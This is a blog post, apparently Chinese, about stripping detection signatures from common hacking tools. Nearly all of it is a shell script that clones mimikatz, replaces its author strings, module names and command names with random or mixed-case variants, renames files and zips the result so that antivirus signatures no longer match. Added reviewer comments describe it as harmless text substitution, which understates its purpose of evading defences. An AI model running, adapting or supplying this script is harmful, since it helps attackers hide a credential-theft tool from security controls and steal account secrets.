常见工具特征去除
source link: https://www.ascotbe.com/2021/07/09/FrequentToolCharacteristics/
mimikatz改造
替换关键字脚本
#!/bin/sh
# Reviewer note: everything in this script is plain textual find-and-replace
# over a checked-out source tree (sed -i, mv) followed by a zip. No program
# logic is modified, only literal identifiers and file names, so any control
# that does not key on those literal strings is unaffected by it.
#
# Requires: git, GNU sed (`sed -i` with no suffix argument is GNU-only), fold, zip.
# NOTE(review): the clone below lands in ./mimikatz, but every later command
# addresses ./windows/ relative to the current directory — confirm the
# intended working-directory layout before relying on this as written.
git clone --depth=1 https://github.com.cnpmjs.org/gentilkiwi/mimikatz.git mimikatz
## BASIC Strings ##
# Each token is random bytes from /dev/urandom, filtered to the given character
# class (tr -dc), cut into fixed-width lines (fold -w N) and truncated to the
# first line. `mimi` and `kiwi` are reused by the file-name pass at the end;
# `string` is a throwaway that is overwritten before each substitution.
mimi=$(cat /dev/urandom | tr -dc "a-zA-Z" | fold -w 8 | head -n 1)
# Rename the sub-directory first, then rewrite the same identifier inside every
# regular file under windows/ (no name filter, so non-text files are included).
mv windows/mimikatz windows/$mimi
find windows/ -type f -print0 | xargs -0 sed -i "s/mimikatz/$mimi/g"
MIMI=$(cat /dev/urandom | tr -dc "A-Z" | fold -w 8 | head -n 1)
find windows/ -type f -print0 | xargs -0 sed -i "s/MIMIKATZ/$MIMI/g"
Mimi=$(cat /dev/urandom | tr -dc "a-zA-Z" | fold -w 8 | head -n 1)
find windows/ -type f -print0 | xargs -0 sed -i "s/Mimikatz/$Mimi/g"
string=$(cat /dev/urandom | tr -dc "a-zA-Z0-9" | fold -w 5 | head -n 1)
find windows/ -type f -print0 | xargs -0 sed -i "s/DELPY/$string/g"
string=$(cat /dev/urandom | tr -dc "a-zA-Z0-9" | fold -w 8 | head -n 1)
find windows/ -type f -print0 | xargs -0 sed -i "s/Benjamin/$string/g"
string=$(cat /dev/urandom | tr -dc "a-zA-Z0-9" | fold -w 23 | head -n 1)
# NOTE(review): "[email protected]" here (and again below) looks like the page's
# e-mail masking, not the literal pattern — compare with the upstream script.
find windows/ -type f -print0 | xargs -0 sed -i "s/[email protected]/$string/g"
string=$(cat /dev/urandom | tr -dc "a-zA-Z0-9" | fold -w 15 | head -n 1)
find windows/ -type f -print0 | xargs -0 sed -i "s/creativecommons/$string/g"
string=$(cat /dev/urandom | tr -dc "a-zA-Z0-9" | fold -w 10 | head -n 1)
find windows/ -type f -print0 | xargs -0 sed -i "s/gentilkiwi/$string/g"
string=$(cat /dev/urandom | tr -dc "a-zA-Z" | fold -w 4 | head -n 1)
find windows/ -type f -print0 | xargs -0 sed -i "s/KIWI/$string/g"
string=$(cat /dev/urandom | tr -dc "a-zA-Z" | fold -w 4 | head -n 1)
find windows/ -type f -print0 | xargs -0 sed -i "s/Kiwi/$string/g"
# Kept in `kiwi` (not `string`) because the file-name pass at the end needs it.
kiwi=$(cat /dev/urandom | tr -dc "a-zA-Z" | fold -w 4 | head -n 1)
find windows/ -type f -print0 | xargs -0 sed -i "s/kiwi/$kiwi/g"
string=$(cat /dev/urandom | tr -dc "a-zA-Z0-9" | fold -w 13 | head -n 1)
find windows/ -type f -print0 | xargs -0 sed -i "s/A La Vie, A L/$string/g"
string=$(cat /dev/urandom | tr -dc "a-zA-Z0-9" | fold -w 24 | head -n 1)
find windows/ -type f -print0 | xargs -0 sed -i "s/[email protected]/$string/g"
string=$(cat /dev/urandom | tr -dc "a-zA-Z0-9" | fold -w 8 | head -n 1)
find windows/ -type f -print0 | xargs -0 sed -i "s/benjamin/$string/g"
string=$(cat /dev/urandom | tr -dc "a-zA-Z0-9" | fold -w 14 | head -n 1)
find windows/ -type f -print0 | xargs -0 sed -i "s/Benjamin DELPY/$string/g"
string=$(cat /dev/urandom | tr -dc "a-zA-Z0-9" | fold -w 5 | head -n 1)
find windows/ -type f -print0 | xargs -0 sed -i "s/oe.eo/$string/g"
string=$(cat /dev/urandom | tr -dc "a-zA-Z0-9" | fold -w 14 | head -n 1)
find windows/ -type f -print0 | xargs -0 sed -i "s/pingcastle.com/$string/g"
string=$(cat /dev/urandom | tr -dc "a-zA-Z0-9" | fold -w 16 | head -n 1)
find windows/ -type f -print0 | xargs -0 sed -i "s/mysmartlogon.com/$string/g"
string=$(cat /dev/urandom | tr -dc "a-zA-Z0-9" | fold -w 15 | head -n 1)
find windows/ -type f -print0 | xargs -0 sed -i "s/Vincent LE TOUX/$string/g"
## Basic Function Names ##
# From here on the replacements are fixed mixed-case respellings rather than
# random tokens; each line is a separate global pass over every file.
find windows/ -type f -print0 | xargs -0 sed -i "s/logonPasswords/loGoNpASSwoRdS/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/dpapi/dPApi/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/sekurlsa/seKuRlSa/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/sekurLSA/seKuRlSa/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/ngc/nGc/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/lsadump/lsADumP/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/crypto/cRyPTO/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/kerberos/kErberoS/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/token/tOKEn/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/misc/mIsC/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/minesweeper/mInesWeEpEr/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/vault/vAULt/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/privilege/PRIViLeGe/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/process/ProCeSs/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/busylight/bUsYlIght/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/sr98/sR98/g"
## Sub-function Names ##
# Sekurlsa #
find windows/ -type f -print0 | xargs -0 sed -i "s/msv/mSv/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/wdigest/wDiGeST/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/tspkg/tsPkG/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/livessp/liVeSsP/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/cloudap/clOuDAp/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/ssp/sSp/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/logonpasswords/loGonPaSSworDs/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/minidump/mIniDumP/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/bootkey/bOOtKey/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/pth/ptH/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/krbtgt/krbTgT/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/backupkeys/backUpKeyS/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/tickets/ticKets/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/ekeys/eKeYs/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/credman/crEdMan/g"
# The next two lines duplicate the tickets/ekeys passes above; the second run
# finds nothing left to match because the earlier pass already changed the case.
find windows/ -type f -print0 | xargs -0 sed -i "s/tickets/ticKets/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/ekeys/eKeYs/g"
# Crypto #
find windows/ -type f -print0 | xargs -0 sed -i "s/providers/prOviDers/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/certificates/certIfiCatEs/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/scauth/sCaUth/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/extract/exTraCt/g"
# dpapi #
find windows/ -type f -print0 | xargs -0 sed -i "s/masterkey/masTerKeY/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/credhist/crEdHiSt/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/cloudapkd/clOudApKd/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/cloudapreg/clOuDapReg/g"
# kerberos #
find windows/ -type f -print0 | xargs -0 sed -i "s/golden/golDen/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/ptt/pTt/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/clist/cLiSt/g"
# lsadump #
find windows/ -type f -print0 | xargs -0 sed -i "s/secrets/seCrEts/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/sam/saM/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/dcshadow/dCShAdoW/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/dcsync/dCsYnC/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/setntlm/seTnTlM/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/netsync/neTSynC/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/cache/caCHe/g"
# misc #
find windows/ -type f -print0 | xargs -0 sed -i "s/regedit/reGeDit/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/skeleton/sKeLeToN/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/easyntlmchall/easYnTlmChaLl/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/ncroutemon/nCroUTeMoN/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/taskmgr/taSkMgR/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/aadcookie/aAdcOoKiE/g"
# vault #
find windows/ -type f -print0 | xargs -0 sed -i "s/cred/crEd/g"
# token #
find windows/ -type f -print0 | xargs -0 sed -i "s/elevate/eleVatE/g"
find windows/ -type f -print0 | xargs -0 sed -i "s/revert/reVeRt/g"
## Replace file names ##
# Rename files whose names still carry the two identifiers, reusing the `mimi`
# and `kiwi` tokens chosen above so names and contents agree. Paths arrive
# newline-separated from find and are read one per iteration.
find windows/ -type f -name "*mimikatz*" | while read FILE ; do
newfile="$(echo ${FILE} |sed -e "s/mimikatz/$mimi/g")";
mv "${FILE}" "${newfile}";
done
find windows/ -type f -name "*kiwi*" | while read FILE ; do
newfile="$(echo ${FILE} |sed -e "s/kiwi/$kiwi/g")";
mv "${FILE}" "${newfile}";
done
## ZIP File ##
# Bundle the rewritten tree; the archive name itself is left unchanged.
zip -r mimi.zip ./windows